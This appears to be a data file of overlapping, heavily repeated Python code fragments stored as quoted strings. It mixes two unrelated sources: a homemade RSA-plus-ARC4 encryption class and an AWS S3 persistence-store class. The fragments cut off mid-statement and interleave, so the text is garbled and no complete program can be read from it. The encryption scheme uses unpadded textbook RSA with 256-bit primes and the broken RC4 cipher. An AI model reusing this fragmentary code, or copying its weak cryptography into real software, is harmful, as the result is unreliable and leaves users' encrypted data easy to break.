"enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] )",
"if(c % a == 0): c = c//a break i = i+1 return",
"from arc4 import ARC4 def gcd(a, b): while b != 0: a, b",
"import base64 import binascii from secrets import token_hex from rsa import prime from",
"tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher =",
"self.N = params['N'] self.phi = params['phi'] self.e = params['e'] self.d = params['d'] def",
"a % b return a def lcm(a, b): return a * b //",
"SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0 while p == q:",
"import token_hex from rsa import prime from arc4 import ARC4 def gcd(a, b):",
"self.q = params['q'] self.N = params['N'] self.phi = params['phi'] self.e = params['e'] self.d",
"gcd(a, b): while b != 0: a, b = b, a % b",
"!= 0: a, b = b, a % b return a def lcm(a,",
"e self.d = d def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N,",
"= params['q'] self.N = params['N'] self.phi = params['phi'] self.e = params['e'] self.d =",
"message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher",
"= params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message)",
"arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256):",
"base64 import binascii from secrets import token_hex from rsa import prime from arc4",
"= (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict(",
"self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if __name__",
"isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res",
"(self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p, q, N, phi, e,",
"= int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d,",
"bit_length=256): p, q = 0, 0 while p == q: p = prime.getprime(bit_length)",
"self.e = 65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N,",
"def load(self, p, q, N, phi, e, d): self.p = p self.q =",
"lcm(a, b): return a * b // gcd(a, b) def imod(a, n): i",
"b return a def lcm(a, b): return a * b // gcd(a, b)",
"self.d) def load(self, p, q, N, phi, e, d): self.p = p self.q",
"while True: c = n * i + 1 if(c % a ==",
"self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return",
"i = 1 while True: c = n * i + 1 if(c",
"encrypt(self, m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1],",
"q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q = q",
"= ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key)",
"user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1]",
"self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey =",
"return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain",
"self.phi, self.e, self.d) def load(self, p, q, N, phi, e, d): self.p =",
"N, phi, e, d): self.p = p self.q = q self.N = N",
"other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def",
"self.phi = lcm(self.p - 1, self.q - 1) self.e = 65537 self.d =",
"q = prime.getprime(bit_length) self.p = p self.q = q self.N = self.p*self.q self.phi",
"def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message",
"c//a break i = i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key)",
"m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0])",
"return a def lcm(a, b): return a * b // gcd(a, b) def",
"self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m,",
"= prime.getprime(bit_length) self.p = p self.q = q self.N = self.p*self.q self.phi =",
"b, a % b return a def lcm(a, b): return a * b",
"= arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p, q = 0,",
"self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p,",
"if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self,",
"imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self,",
"1 while True: c = n * i + 1 if(c % a",
"= d def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d) def",
"params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return",
"= arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if __name__ == \"__main__\": pass",
"True: c = n * i + 1 if(c % a == 0):",
"self.d = params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k,",
"a def lcm(a, b): return a * b // gcd(a, b) def imod(a,",
"(user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key,",
"= q self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q - 1)",
"token_hex from rsa import prime from arc4 import ARC4 def gcd(a, b): while",
"1) self.e = 65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q,",
"load(self, p, q, N, phi, e, d): self.p = p self.q = q",
"p self.q = q self.N = N self.phi = phi self.e = e",
"arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key =",
"prime.getprime(bit_length) self.p = p self.q = q self.N = self.p*self.q self.phi = lcm(self.p",
"0: a, b = b, a % b return a def lcm(a, b):",
"0 while p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p =",
"b): while b != 0: a, b = b, a % b return",
"ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p, q",
"q, N, phi, e, d): self.p = p self.q = q self.N =",
"user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key)",
"n): i = 1 while True: c = n * i + 1",
"i + 1 if(c % a == 0): c = c//a break i",
"i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return",
"arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher):",
"= 0, 0 while p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length)",
"= params['N'] self.phi = params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self,",
"a, b = b, a % b return a def lcm(a, b): return",
"self.p = params['p'] self.q = params['q'] self.N = params['N'] self.phi = params['phi'] self.e",
"self.e, self.d) def load(self, p, q, N, phi, e, d): self.p = p",
"p, q = 0, 0 while p == q: p = prime.getprime(bit_length) q",
"= arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key",
"= N self.phi = phi self.e = e self.d = d def get_pub(self):",
"- 1, self.q - 1) self.e = 65537 self.d = imod(self.e, self.phi) def",
"self.phi = params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message):",
"time import base64 import binascii from secrets import token_hex from rsa import prime",
"import binascii from secrets import token_hex from rsa import prime from arc4 import",
"arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 =",
"gcd(a, b) def imod(a, n): i = 1 while True: c = n",
"self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q - 1) self.e =",
"e, d): self.p = p self.q = q self.N = N self.phi =",
"self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d)",
"self.e = e self.d = d def get_pub(self): return (self.N, self.e) def get_priv(self):",
"c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params):",
"import prime from arc4 import ARC4 def gcd(a, b): while b != 0:",
"message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key",
"def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key =",
"from secrets import token_hex from rsa import prime from arc4 import ARC4 def",
"d): self.p = p self.q = q self.N = N self.phi = phi",
"c = c//a break i = i+1 return c def arc4_encrypt(key, message): arc4",
"while p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p",
"= b, a % b return a def lcm(a, b): return a *",
"== q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q =",
"dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p, q, N,",
"def lcm(a, b): return a * b // gcd(a, b) def imod(a, n):",
"def decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def",
"token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message)",
"d def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self,",
"other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if __name__ ==",
"message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4",
"return (self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int): m =",
"phi, e, d): self.p = p self.q = q self.N = N self.phi",
"params['q'] self.N = params['N'] self.phi = params['phi'] self.e = params['e'] self.d = params['d']",
"n * i + 1 if(c % a == 0): c = c//a",
"a == 0): c = c//a break i = i+1 return c def",
"= self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey",
"arc4 import ARC4 def gcd(a, b): while b != 0: a, b =",
"b // gcd(a, b) def imod(a, n): i = 1 while True: c",
"= e self.d = d def get_pub(self): return (self.N, self.e) def get_priv(self): return",
"while b != 0: a, b = b, a % b return a",
"% b return a def lcm(a, b): return a * b // gcd(a,",
"0, 0 while p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p",
"def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m,",
"plain class SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0 while p",
"= lcm(self.p - 1, self.q - 1) self.e = 65537 self.d = imod(self.e,",
"binascii from secrets import token_hex from rsa import prime from arc4 import ARC4",
"self.p*self.q self.phi = lcm(self.p - 1, self.q - 1) self.e = 65537 self.d",
"p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q",
"N self.phi = phi self.e = e self.d = d def get_pub(self): return"
] |
[
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"<<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3",
"store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client",
"Data, it uses AWS S3 as of now as data store.\"\"\" def __init__(self,",
"creating or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to",
"KIND, either express or implied. # See the License for the specific language",
"limitations under the License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store",
"Unless required by applicable law or agreed to in writing, software # distributed",
"You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR",
"# See the License for the specific language governing permissions and # limitations",
"client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data =",
"self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data = dict()",
"License. # You may obtain a copy of the License at # #",
"if not json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename,",
"src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save",
"s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data =",
"# limitations under the License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence",
"self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s",
"SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery Data,",
"\"\"\"Upload s3 bucket.\"\"\" # connect after creating or with existing s3 client self.s3_client.connect()",
"not json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename, json_data)",
"law or agreed to in writing, software # distributed under the License is",
"from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to",
"now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client",
"the License for the specific language governing permissions and # limitations under the",
"= AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name,",
"update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating or with",
"# connect after creating or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected():",
"or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect",
"compliance with the License. # You may obtain a copy of the License",
"__init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client = s3_client",
"to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data",
"store using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS,",
"# # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import logging",
"as of now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client",
"on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,",
"uses AWS S3 as of now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize",
"this file except in compliance with the License. # You may obtain a",
"import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery",
"S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger",
"2020 Red Hat Inc. # # Licensed under the Apache License, Version 2.0",
"connect after creating or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise",
"the Apache License, Version 2.0 (the \"License\"); # you may not use this",
"to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.',",
"you may not use this file except in compliance with the License. #",
"rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore:",
"json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename, json_data) logger.info('Updated",
"to save Bigquery Data, it uses AWS S3 as of now as data",
"dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not",
"store to save Bigquery Data, it uses AWS S3 as of now as",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"= dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if",
"exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to",
"self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise",
"else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self,",
"if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key,",
"ANY KIND, either express or implied. # See the License for the specific",
"Copyright © 2020 Red Hat Inc. # # Licensed under the Apache License,",
"region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload",
"in compliance with the License. # You may obtain a copy of the",
"if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data:",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"# Copyright © 2020 Red Hat Inc. # # Licensed under the Apache",
"# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #",
"use this file except in compliance with the License. # You may obtain",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"not use this file except in compliance with the License. # You may",
"governing permissions and # limitations under the License. # # Author: <NAME> <<EMAIL>>",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See",
"not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename):",
"connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename)",
"See the License for the specific language governing permissions and # limitations under",
"BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"License, Version 2.0 (the \"License\"); # you may not use this file except",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may",
"def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating or",
"Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename, json_data) logger.info('Updated file Succefully!')",
"IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"# \"\"\"Implementation persistence store using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from",
"as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if",
"s3 bucket.\"\"\" # connect after creating or with existing s3 client self.s3_client.connect() if",
"json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the json data",
"\"\"\"Persistence store to save Bigquery Data, it uses AWS S3 as of now",
"distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY",
"© 2020 Red Hat Inc. # # Licensed under the Apache License, Version",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it uses AWS S3",
"s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client = s3_client else:",
"OF ANY KIND, either express or implied. # See the License for the",
"def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client =",
"permissions and # limitations under the License. # # Author: <NAME> <<EMAIL>> #",
"2.0 (the \"License\"); # you may not use this file except in compliance",
"# you may not use this file except in compliance with the License.",
"DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client = s3_client else: self.s3_client =",
"s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not",
"for the specific language governing permissions and # limitations under the License. #",
"agreed to in writing, software # distributed under the License is distributed on",
"after creating or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable",
"json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename)",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the",
"Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import logging from rudra.data_store.aws",
"of now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client =",
"(the \"License\"); # you may not use this file except in compliance with",
"using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS",
"= self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}')",
"object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3(",
"<NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import logging from rudra.data_store.aws import",
"= logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it uses AWS",
"s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data",
"# # Unless required by applicable law or agreed to in writing, software",
"express or implied. # See the License for the specific language governing permissions",
"Version 2.0 (the \"License\"); # you may not use this file except in",
"# Unless required by applicable law or agreed to in writing, software #",
"except in compliance with the License. # You may obtain a copy of",
"aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\"",
"filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating or with existing s3 client",
"by applicable law or agreed to in writing, software # distributed under the",
"AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it",
"AWS S3 as of now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing",
"Exception('Unable to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get",
"under the License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using",
"logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__)",
"with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to",
"either express or implied. # See the License for the specific language governing",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"Inc. # # Licensed under the Apache License, Version 2.0 (the \"License\"); #",
"# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"may not use this file except in compliance with the License. # You",
"License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS",
"persistence store using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import",
"from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class",
"self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data,",
"Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not",
"Hat Inc. # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either",
"class PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it uses AWS S3 as",
"file except in compliance with the License. # You may obtain a copy",
"s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def",
"self.s3_client = s3_client if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region,",
"save Bigquery Data, it uses AWS S3 as of now as data store.\"\"\"",
"data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client:",
"under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES",
"Red Hat Inc. # # Licensed under the Apache License, Version 2.0 (the",
"AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'):",
"License for the specific language governing permissions and # limitations under the License.",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"and # limitations under the License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation",
"the License. # You may obtain a copy of the License at #",
"language governing permissions and # limitations under the License. # # Author: <NAME>",
"AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store",
"aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" #",
"to in writing, software # distributed under the License is distributed on an",
"the License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\"",
"\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"s3_client if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id,",
"the specific language governing permissions and # limitations under the License. # #",
"# distributed under the License is distributed on an \"AS IS\" BASIS, #",
"# Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import logging from",
"implied. # See the License for the specific language governing permissions and #",
"logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it uses",
"\"License\"); # you may not use this file except in compliance with the",
"is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF",
"logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable",
"obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename, json_data) logger.info('Updated file",
"required by applicable law or agreed to in writing, software # distributed under",
"import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence",
"applicable law or agreed to in writing, software # distributed under the License",
"SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after",
"data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating or with existing",
") def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating",
"raise Exception('Unable to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists,",
"\"\"\"Implementation persistence store using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings",
"filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the json",
